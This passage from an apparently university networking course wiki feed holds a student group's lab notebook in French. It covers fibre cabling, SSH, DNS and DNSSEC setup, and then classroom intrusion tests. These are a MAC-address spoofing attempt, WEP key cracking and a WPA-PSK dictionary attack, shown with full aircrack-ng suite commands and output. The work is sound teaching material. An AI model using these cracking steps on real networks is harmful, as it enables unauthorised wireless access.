                       36 40 94 7D B4 05 80 B2 60 FA 84 81 50 CE DC 87 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 83 03 24 AC 39 AB 67 E7 7B C4 40 E8 6B 6D 7D 47 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35208</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35208"/>
				<updated>2016-11-17T10:46:34Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Cassage de mot de passe WPA-PSK par force brute */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE jjlddelamuerto.space&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE jjlddelamuerto.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# ls&lt;br /&gt;
Kjjlddelamuerto.space-ksk.key	   Kjjlddelamuerto.space-zsk.key&lt;br /&gt;
Kjjlddelamuerto.space-ksk.private  Kjjlddelamuerto.space-zsk.private&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
Nous refaisons les mêmes actions que pour le crackage de clef WEP.&lt;br /&gt;
Cette fois nous essayons de cracker la clef WPA sur cracotte03.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wpa wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 13 -w crackWPA wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous avons lancé ceci sur le eeePC qui a une vitesse de traitement 5 fois inférieure à celle d'une zabeth environ (environ 5h de traitement). Puis nous obtenons le résultat suivant:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou/crackWPA# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [04:32:42] 12399908 keys tested (759.63 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399903 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 33 2B 69 DD 95 0A 5A E0 01 22 7E FF 98 DA 99 87 &lt;br /&gt;
                       40 7A CB CC 8A E5 32 9F FE 4E 5C 44 91 38 13 93 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 70 EE 27 96 5B 34 B5 4F 06 A1 F2 B6 A7 16 1E 21 &lt;br /&gt;
                       7A 0B BD F4 13 67 5B 4C ED 30 A9 0D 91 E3 F9 7F &lt;br /&gt;
                       88 E6 12 68 9C 77 4B 48 EB 5E 6A 5A DD 1D D9 08 &lt;br /&gt;
                       36 40 94 7D B4 05 80 B2 60 FA 84 81 50 CE DC 87 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 83 03 24 AC 39 AB 67 E7 7B C4 40 E8 6B 6D 7D 47 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=34993</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=34993"/>
				<updated>2016-11-07T11:30:03Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Travail commun */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
